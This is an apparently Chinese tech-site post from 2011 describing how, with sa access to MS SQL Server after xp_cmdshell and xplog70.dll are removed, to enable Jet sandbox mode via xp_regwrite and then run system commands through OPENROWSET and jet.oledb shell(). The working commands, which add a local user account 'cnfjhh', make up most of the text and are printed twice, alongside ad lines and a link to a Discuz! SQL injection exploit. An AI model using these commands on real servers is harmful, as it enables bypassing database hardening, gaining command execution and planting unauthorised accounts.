SA 沙盘模式下不用恢复xp_cmdshell和xplog70.dll也执行命令
更新时间:2011年01月04日 23:53:03 作者:
sa下删除xp_cmdshell和xplog70.dll时候的一种办法,不算新的了,
也被一些人不断的再次提出来,为了方便自己记忆再写出来,
在这种情况下,要执行命令,条件是要有xp_regwrite。
(福利推荐:【腾讯云】服务器最新限时优惠活动,云服务器1核2G仅99元/年、2核4G仅768元/3年,立即抢购>>>:9i0i.cn/qcloud)
(福利推荐:你还在原价购买阿里云服务器?现在阿里云0.8折限时抢购活动来啦!4核8G企业云服务器仅2998元/3年,立即抢购>>>:9i0i.cn/aliyun)
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
您可能感兴趣的文章:
相关文章
Discuz! 4.x SQL injection / admin credentials disclosure exp
Discuz! 4.x SQL injection / admin credentials disclosure exploit...2006-11-11
最新评论